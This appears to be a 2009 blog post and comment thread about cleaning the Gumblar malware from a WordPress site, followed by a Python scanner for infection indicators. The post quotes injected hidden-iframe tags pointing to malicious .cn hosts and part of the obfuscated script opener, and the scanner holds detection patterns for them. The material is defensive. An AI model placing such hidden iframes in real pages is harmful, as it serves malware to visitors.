Yesterday one of my websites got infected by suspicious malware from gumblar.cn. That site hosts several exploits and trojans that can harm your system. It starts its infection by invoking Adobe Acrobat Reader on your machine: after browsing my infected site, I found an Acrobat Reader process running in Task Manager.
According to the Google Safe Browsing Service:
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s). This site was hosted on 1 network(s) including AS42831 (UKSERVERS).
I found that some of the PHP files had been altered by adding an iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php, <my-url>/wp-admin/index.php and, in the same directory, index-extra.php. I didn't find any other file infected by this.
I manually removed this embedded iframe <iframe src="http://liteautotop .cn/ts/in.cgi?mozila" width=2 height=4 style="visibility: hidden"></iframe> and everything works fine.
If you have any information about this infection, the people searching the internet for a solution to this problem will highly appreciate it.
Update (5/11/09): I was able to remove this malware from my blog and WordPress admin site.
Removal
- Removed the image.php file from every images folder. The image.php infection was only found in 'image' folders. Make sure you don't remove an original image.php file; if your original file is infected, remove only the malicious code.
- Looked for iframe code added at the top or bottom of each PHP page and removed it. This is the iframe I found and removed: <iframe src="http: //bigtruckstopseek .cn/ts/in.cgi?banner2" width=2 height=4 style="visibility: hidden">
- Checked all PHP, HTML and JS files for added anonymous JavaScript methods. I found all JS files in the wp-includes directory infected.
- Set the httpdocs directory permissions to 755.
- Scanned my computer with Malwarebytes' Anti-Malware, which identified and removed several threats.
- Updated my AVG Anti-Virus.
- Changed my FTP password.
- I did all of this manual code removal from my Plesk control panel.
Please feel free to comment and suggest further security measures to prevent such threats.
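As an added example (not code from the original post or its comments), the script below automates the checks from the removal list above and the directory-permission discussion in the comments: it walks a web root looking for hidden iframes, the "(function(){var X='%'" opener of the injected script, an image.php dropped in an images folder, and world-writable directories. The sample tree it builds is constructed with a harmless example.invalid URL and stand-in contents; point scan_tree at a real httpdocs directory to use it.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicators taken from the post and comments: hidden iframe tag, the
# "(function(){var X='%'" script opener, dropped image.php, world-writable dirs.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*visibility:\s*hidden[^>]*>", re.I)
OBFUSCATED_JS = re.compile(r"\(function\(\)\{var\s+\w+\s*=\s*'%'")
SCAN_EXT = (".php", ".html", ".htm", ".js")


def scan_tree(root):
    """Walk a web root and return sorted findings, keyed by indicator type."""
    findings = {"hidden_iframe": [], "obfuscated_js": [], "image_php": [], "world_writable": []}
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:  # 'Other' has write access
            findings["world_writable"].append(os.path.relpath(dirpath, root))
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == "image.php" and os.path.basename(dirpath).lower() in ("image", "images"):
                findings["image_php"].append(rel)
            if not name.lower().endswith(SCAN_EXT):
                continue
            text = Path(path).read_text(errors="replace")
            if HIDDEN_IFRAME.search(text):
                findings["hidden_iframe"].append(rel)
            if OBFUSCATED_JS.search(text):
                findings["obfuscated_js"].append(rel)
    return {k: sorted(v) for k, v in findings.items()}


def build_demo_site():
    """Constructed WordPress-like tree with harmless stand-ins for the indicators (not real malware)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    files = {
        "wp-admin/index.php": '<?php echo "admin"; ?>\n<iframe src="http://example.invalid/ts/in.cgi?banner2"'
                              ' width=2 height=4 style="visibility: hidden"></iframe>\n',
        "wp-includes/js/jquery.js": "(function(){var CEz9t='%';var fQJ=('va.72.20a');})();\n",
        "wp-content/uploads/images/image.php": "<?php /* dropped stand-in */ ?>\n",
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    for dirpath, _dirs, _files in os.walk(root):  # normalise to 755, then open one dir up
        os.chmod(dirpath, 0o755)
    os.chmod(Path(root, "wp-content/uploads"), 0o777)
    return root
```

Each finding is a path to inspect by hand; a matching file is cleaned or restored from a known-good copy, and any world-writable directory is set back to 755 as the comments below recommend.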
Yes – One of my clients has also been infected by this malware. Every time we remove it, it manages to creep back into the system.
Most professionals are using Avast on their computer and Secure FTP while uploading files onto the server.
This is the best information that I have read so far. Perhaps it could be useful for someone.
http://www.dynamicdrive.com/forums/showthread.php?t=43390&page=3
If there is any more valuable information, we would be keen to learn it.
Thanks Gaurav for your comments.
I will consider the software that you recommend for secure uploading. After my manual removal, it hasn't injected my files again.
I also recommend that hosting providers upgrade their Linux machines with the latest security patches. A Linux machine without security patches is the most vulnerable.
I found this virus 10 days ago and 4 of my customers got it.
We removed it more than 10 times, but the next day, amazingly, it was on all pages again.
I found the source file.
In each "Images" folder in your site it copies a PHP file, "image.php".
Before removing the script from the pages, you must put a file of the same name in place of image.php and change the permissions.
Then remove the scripts.
If your site gets the iframe version, you must remove the iframe and then replace image.php as fast as you can,
because Google may consider your site a harmful site.
The good news is that .asp files won't get this virus.
Another thing is that in CMS sites I changed the permissions of the template folders!!!
Thanks adel. The same is happening with me. After removing the iframe code from my infected pages, I found it appears again. What you said about image.php and changing the permissions of the theme folder looks very helpful. Let's see whether, after following this, the malware infection is removed permanently or not.
Tahir,
Unfortunately your site is still infected. Both with the iframe from "bigtruckstopseek .cn" (which is actually not the gumblar exploit) and with the real "gumblar" script, which can be found right before the body tag. It starts with "(function(){var CEz9t='%';var fQJ=('va.72.20a.3d.22S…".
Read my article about this exploit. There are many comments with additional information that may help you get rid of this exploit.
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
I have found enough files infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell you, I used fact no. 10 given in your blog. And I am also able to remove the iframe for bigtruckstopseek.cn/ts/in.cgi?banner2. Your blog is very helpful.
Hi Guys,
I had the same issue; after cleaning the file it came back again. The problem seems to be that you might have given global access to the folder. When I removed that access and gave read-only access, with write access only to admin, the problem was solved.
Guys, check and let me know if it works.
Regards,
Lloyd
Lloyd, what chmod are you using for your directories? The problem for me is that if I remove write and execute access from the 'Other' group, my blog appears as a blank page. So I am wondering what chmod will suit my situation. Any idea...
Here you will find “Permission Scheme for WordPress”
http://codex.wordpress.org/Changing_File_Permissions
Here is another good article to read:
http://codex.wordpress.org/Hardening_WordPress
@Tahir Akram: I’d say start with chmod 755. That will prevent anyone except for the owner from having write access.
Thanks Denis, ST, Gaurav, adel & Lloyd for your comments and support to remove this threat.
I have successfully removed this threat from my blog and WordPress admin. And I pretty much followed what you said. I have updated the post with my course of actions. Please feel free to comment.
Again thanks.
Hello
For a few days now, when I open my site my Persian.be antivirus reports that "Application firefox contains to web page gumblar .cn/rrs/?id=, uses to steal password, credit card numbers or other confidential data. Denied."
What can I do to fix it?
Amir, you need to follow the steps given in this post and by Denis (comment no. 5).
I want to get rid of the gumblar.cn problem, so could you please help me?
Hi All,
I want this gumblar problem not to come again. Please help me.
Hi Gagan;
Did you follow the steps given in this post and discussion? I hope you will get rid of it, as I did. Just start on it.
We have found a script. Please help me with how to protect our site from gumblar.cn infection.
Naresh, please share your findings here to let us know what remedy steps you required.
Don’t forget the error documents of your website, even if they reside outside of the httpdocs tree.
Access was gained via FTP, so please check where your FTP login has access (i.e. httpdocs, httpsdocs, cgi-bin, errordocs, …)
Next, CHECK YOUR COMPUTER, for you will have been infected. http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/